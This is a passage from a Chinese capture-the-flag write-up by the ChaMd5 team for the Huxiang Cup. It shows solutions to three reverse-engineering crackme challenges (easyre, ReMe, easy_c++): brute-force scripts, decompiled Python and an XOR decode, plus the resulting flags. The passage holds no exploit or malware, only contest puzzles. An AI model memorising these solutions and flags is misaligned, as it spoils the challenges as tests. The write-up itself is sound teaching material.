0x00002e71,     0x0000a6f1, 0x0000dfcf, 0x00003ece, 0x00007d49,     0x0000c24d, 0x0000237e, 0x00009352, 0x00007a97,     0x00007bfa, 0x0000cbaa, 0x000010dc, 0x00003bd9,     0x00007d7b, 0x00003b88, 0x0000b0d0, 0x0000e8bc     ]  b = [     0x08a73233, 0x116db0f6, 0x0e654937, 0x03c374a7,     0x16bc8ed9, 0x0846b755, 0x08949f47, 0x04a13c27,     0x0976cf0a, 0x07461189, 0x1e1a5c12, 0x11e64d96,     0x03cf09b3, 0x093cb610, 0x0d41ea64, 0x07648050,     0x092039bf, 0x08e7f1f7, 0x004d871f, 0x1680f823,     0x06f3c3eb, 0x2205134d, 0x015c6a7c, 0x11c67ed0,     0x0817b32e, 0x06bd9b92, 0x08806b0c, 0x06aaa515,     0x205b9f76, 0x0de963e9, 0x2194e8e2, 0x047593bc     ]  for i in range(32):     for j in range(32,127):         temp = j*j*a[(i<<2)//4] + a[((i+32)<<2)//4]*j + a[((i+64) << 2)//4]         if temp == b[i]:             print(chr(j),end='')             break


easyre

解题思路

       湖湘杯-WriteUp      

这题放入IDA可以看到,在main中其实是没有关于flag的check部分的。有的只是对flag的长度的一个check,仅仅只是要求了flag的长度为0x18。之后就会ret,会到上一级函数。这里我没有选择去用IDA深究,而是用OD去动态调试看一下。

       湖湘杯-WriteUp      

向下跟进可以看到在main返回之后,会有一个加密的过程。先将第一个字符与0xe0存到栈中。之后就是第一个字符左移3位,第二个字符右移5位,之后取或运算。之后异或循环变量也就是字符数组下标。大致伪代码就是(((input[i])|(input[i+1]))&0xff)^i。最后将存入栈中的变量和最后一位做运算。

再次ret可以看到check部分,找到加密flag之后的数据。

湖湘杯-WriteUp 位运算本身不可逆,而我算法也不大行,所以直接正面爆破。我们可以把每一位的表达式看做一种条件,而对于移位和或运算,必然会有多解,满足所有条件,才能确定唯一的flag。在我多次的尝试之后发现,每一位的取值其实可能性也很有限,而在前后两个条件的限制下,其实就会固定,所以可以进行分段爆破。(不存在艺术,简单粗暴才能抢血)大致给一下部分代码截图,就不给完全了,每个人的爆破代码都不一样的。

湖湘杯-WriteUp


ReMe

解题思路

这题主要考察python的反编译,具体从exe->pyc->py这个过程可以百度,这里不多说。反编译后的代码如下

# uncompyle6 version 3.7.4# Python bytecode 3.7 (3394)# Decompiled from: Python 2.7.15+ (default, Aug 31 2018, 11:56:52) # [GCC 8.2.0]# Warning: this version of Python has problems handling the Python 3 "byte" type in constants properly.# Embedded file name: ReMe.py# Compiled at: 1995-09-28 00:18:56# Size of source mod 2**32: 272 bytesimport sys, hashlibcheck = [ 'e5438e78ec1de10a2693f9cffb930d23', '08e8e8855af8ea652df54845d21b9d67', 'a905095f0d801abd5865d649a646b397', 'bac8510b0902185146c838cdf8ead8e0', 'f26f009a6dc171e0ca7a4a770fecd326', 'cffd0b9d37e7187483dc8dd19f4a8fa8', '4cb467175ab6763a9867b9ed694a2780', '8e50684ac9ef90dfdc6b2e75f2e23741', 'cffd0b9d37e7187483dc8dd19f4a8fa8', 'fd311e9877c3db59027597352999e91f', '49733de19d912d4ad559736b1ae418a7', '7fb523b42413495cc4e610456d1f1c84', '8e50684ac9ef90dfdc6b2e75f2e23741', 'acb465dc618e6754de2193bf0410aafe', 'bc52c927138231e29e0b05419e741902', '515b7eceeb8f22b53575afec4123e878', '451660d67c64da6de6fadc66079e1d8a', '8e50684ac9ef90dfdc6b2e75f2e23741', 'fe86104ce1853cb140b7ec0412d93837', 'acb465dc618e6754de2193bf0410aafe', 'c2bab7ea31577b955e2c2cac680fb2f4', '8e50684ac9ef90dfdc6b2e75f2e23741', 'f077b3a47c09b44d7077877a5aff3699', '620741f57e7fafe43216d6aa51666f1d', '9e3b206e50925792c3234036de6a25ab', '49733de19d912d4ad559736b1ae418a7', '874992ac91866ce1430687aa9f7121fc']def func(num):    result = []    while num != 1:        num = num * 3 + 1 if num % 2 else num // 2        result.append(num)    return resultif __name__ == '__main__':    print('Your input is not the FLAG!')    inp = input()    if len(inp) != 27:        print('length error!')        sys.exit(-1)    for i, ch in enumerate(inp):        ret_list = func(ord(ch))        s = ''        for idx in range(len(ret_list)):            s += str(ret_list[idx])            s += str(ret_list[(len(ret_list) - idx - 1)])        md5 = hashlib.md5()        md5.update(s.encode('utf-8'))        if md5.hexdigest() != check[i]:            sys.exit(i)    md5 = hashlib.md5()    md5.update(inp.encode('utf-8'))    print('You win!')    print('flag{' + md5.hexdigest() + '}')# okay decompiling 2.pyc

稍微改一改源码,就会自己出flag

# uncompyle6 version 3.7.4# Python bytecode 3.7 (3394)# Decompiled from: Python 2.7.15+ (default, Aug 31 2018, 11:56:52) # [GCC 8.2.0]# Warning: this version of Python has problems handling the Python 3 "byte" type in constants properly.# Embedded file name: ReMe.py# Compiled at: 1995-09-28 00:18:56# Size of source mod 2**32: 272 bytesimport sys, hashlibcheck = [ 'e5438e78ec1de10a2693f9cffb930d23', '08e8e8855af8ea652df54845d21b9d67', 'a905095f0d801abd5865d649a646b397', 'bac8510b0902185146c838cdf8ead8e0', 'f26f009a6dc171e0ca7a4a770fecd326', 'cffd0b9d37e7187483dc8dd19f4a8fa8', '4cb467175ab6763a9867b9ed694a2780', '8e50684ac9ef90dfdc6b2e75f2e23741', 'cffd0b9d37e7187483dc8dd19f4a8fa8', 'fd311e9877c3db59027597352999e91f', '49733de19d912d4ad559736b1ae418a7', '7fb523b42413495cc4e610456d1f1c84', '8e50684ac9ef90dfdc6b2e75f2e23741', 'acb465dc618e6754de2193bf0410aafe', 'bc52c927138231e29e0b05419e741902', '515b7eceeb8f22b53575afec4123e878', '451660d67c64da6de6fadc66079e1d8a', '8e50684ac9ef90dfdc6b2e75f2e23741', 'fe86104ce1853cb140b7ec0412d93837', 'acb465dc618e6754de2193bf0410aafe', 'c2bab7ea31577b955e2c2cac680fb2f4', '8e50684ac9ef90dfdc6b2e75f2e23741', 'f077b3a47c09b44d7077877a5aff3699', '620741f57e7fafe43216d6aa51666f1d', '9e3b206e50925792c3234036de6a25ab', '49733de19d912d4ad559736b1ae418a7', '874992ac91866ce1430687aa9f7121fc']def func(num):    result = []    while num != 1:        num = num * 3 + 1 if num % 2 else num // 2        result.append(num)    return resultif __name__ == '__main__':    flag = ''    '''    print('Your input is not the FLAG!')    inp = input()    if len(inp) != 27:        print('length error!')        sys.exit(-1)        for i, ch in enumerate(inp):    '''    for i in range(len(check)):        for ch in range(32,128):            ret_list = func(ch)            s = ''            for idx in range(len(ret_list)):                s += str(ret_list[idx])                s += str(ret_list[(len(ret_list) - idx - 1)])            md5 = hashlib.md5()            md5.update(s.encode('utf-8'))            if md5.hexdigest() == check[i]:                flag += chr(ch)    print(flag)    '''    md5 = hashlib.md5()    md5.update(inp.encode('utf-8'))    print('You win!')    print('flag{' + md5.hexdigest() + '}')    '''# okay decompiling 2.pyc


easy_c++

签到题,最基本的逆向。     

湖湘杯-WriteUp

这里可以看到最关键的三个地方,就是很常见的,密文,加密算法,比较,而算法又是最基础的xor。直接上脚本就行

>>> a = '7d21e<e3<:3;9;ji t r#w"$*{*+*$|,'>>> flag = ''>>> for i in range(len(a)):...     flag += chr(ord(a[i])^i)...>>> flag'7e02a9c4439056df0e2a7b432b0069b3'


end


ChaMd5 ctf组 长期招新

尤其是crypto+reverse+pwn+合约的大佬

欢迎联系[email protected]



湖湘杯-WriteUp


本文始发于微信公众号(ChaMd5安全团队):湖湘杯-WriteUp

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: